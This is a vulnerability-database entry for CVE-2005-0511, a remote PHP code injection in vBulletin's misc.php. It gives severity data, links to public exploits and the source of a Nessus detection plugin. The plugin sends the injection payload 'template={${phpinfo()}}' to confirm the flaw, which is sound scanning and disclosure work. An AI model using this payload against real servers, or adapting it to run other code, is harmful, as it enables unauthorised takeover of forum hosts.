Vulnerabilities > CVE-2005-0511 - Unspecified vulnerability in Jelsoft Vbulletin

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
jelsoft
nessus
exploit available
metasploit
NVD
Published: 2005-02-21
Updated: 2016-10-18

Summary

misc.php for vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.

Vulnerable Configurations

Part Description Count
Application
Jelsoft
29

Exploit-Db

  • descriptionvBulletin <= 3.0.6 php Code Injection. CVE-2005-0511. Webapps exploit for php platform
    idEDB-ID:832
    last seen2016-01-31
    modified2005-02-22
    published2005-02-22
    reporterpokley
    sourcehttps://www.exploit-db.com/download/832/
    titlevBulletin <= 3.0.6 php Code Injection
  • descriptionvBulletin misc.php Template Name Arbitrary Code Execution. CVE-2005-0511. Webapps exploit for php platform
    idEDB-ID:16896
    last seen2016-02-02
    modified2010-07-25
    published2010-07-25
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16896/
    titlevBulletin misc.php Template Name Arbitrary Code Execution

Metasploit

descriptionThis module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.
idMSF:EXPLOIT/UNIX/WEBAPP/PHP_VBULLETIN_TEMPLATE
last seen2020-01-16
modified2017-07-24
published2007-01-05
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/php_vbulletin_template.rb
titlevBulletin misc.php Template Name Arbitrary Code Execution

Nessus

NASL familyCGI abuses
NASL idVBULLETIN_CODE_EXECUTION.NASL
descriptionThe remote version of vBulletin fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id17211
published2005-02-24
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/17211
titlevBulletin misc.php template Parameter PHP Code Injection
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(17211);
 script_version("1.19");
 script_cve_id("CVE-2005-0511");
 script_bugtraq_id(12622);

 script_name(english:"vBulletin misc.php template Parameter PHP Code Injection");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows execution of
arbitrary PHP code." );
 script_set_attribute(attribute:"description", value:
"The remote version of vBulletin fails to sanitize input to the
'template' parameter of the 'misc.php' script.  Provided the 'Add
Template Name in HTML Comments' setting in vBulletin is enabled, an
unauthenticated attacker may use this flaw to execute arbitrary PHP
commands on the remote host." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Feb/542");
 script_set_attribute(attribute:"solution", value:
"Upgrade to vBulletin 3.0.7 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"metasploit_name", value:'vBulletin misc.php Template Name Arbitrary Code Execution');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/24");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/22");
 script_cvs_date("Date: 2018/11/15 20:50:19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:vbulletin:vbulletin");
script_end_attributes();

 script_summary(english:"Executes phpinfo() on the remote host");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencies("vbulletin_detect.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/vBulletin");
 exit(0);
}

# Check starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
if ( ! can_host_php(port:port) ) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/vBulletin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  dir = matches[2];
  r = http_send_recv3(method:"GET",item:dir + "/misc.php?do=page&template={${phpinfo()}}", port:port);
  if (isnull(r)) exit(0);
  res = r[2];
  if ( "<title>phpinfo()</title>" >< res ) security_warning(port);
}

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/82364/php_vbulletin_template.rb.txt
idPACKETSTORM:82364
last seen2016-12-05
published2009-10-30
reporterstr0ke
sourcehttps://packetstormsecurity.com/files/82364/vBulletin-misc.php-Template-Name-Arbitrary-Code-Execution.html
titlevBulletin misc.php Template Name Arbitrary Code Execution

References